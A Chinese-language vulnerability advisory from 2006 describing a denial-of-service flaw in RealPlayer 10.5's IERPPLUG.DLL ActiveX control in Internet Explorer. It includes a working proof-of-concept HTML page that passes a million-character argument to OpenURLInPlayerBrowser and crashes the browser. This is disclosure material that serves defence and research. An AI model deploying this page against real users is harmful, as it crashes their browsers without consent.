RealPlayer IERPPLUG.DLL ActiveX控件远程拒绝服务漏洞
发布日期:2006-12-29
更新日期:2006-12-30
受影响系统:Real Networks RealPlayer 10.5
描述:
BUGTRAQ ID:
21802
RealPlayer是非常流行的媒体播放器,支持多种格式。
IE浏览器在以畸形参数调用RealPlayer的IERPPLUG.DLL ActiveX控件时存在漏洞,恶意网站可能利用此漏洞导致用户浏览器崩溃。
如果用户受骗打开了恶意的WEB页面的话,就会触发这个漏洞,导致浏览器崩溃。
<*来源:shinnai (
shinnai@autistici.org)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<!--
---------------------------------------------------------------------------
RealPlayer 10.5 ierpplug.dll Internet Explorer Denial of Service
author: shinnai
mail: shinnai[at]autistici[dot]org
site:
http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
---------------------------------------------------------------------------
-->
<html>
<object classid='clsid:FDC7A535-4070-4B92-A0EA-D9994BCC0DC5' id='RealPlayer'></object>
<script language='vbscript'>
argCount = 2
arg1="default"
arg2=String(1000000, "A")
RealPlayer.OpenURLInPlayerBrowser arg1 ,arg2
</script>
建议:
厂商补丁:
Real Networks
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.real.com浏览次数:3246
严重程度:0(网友投票)
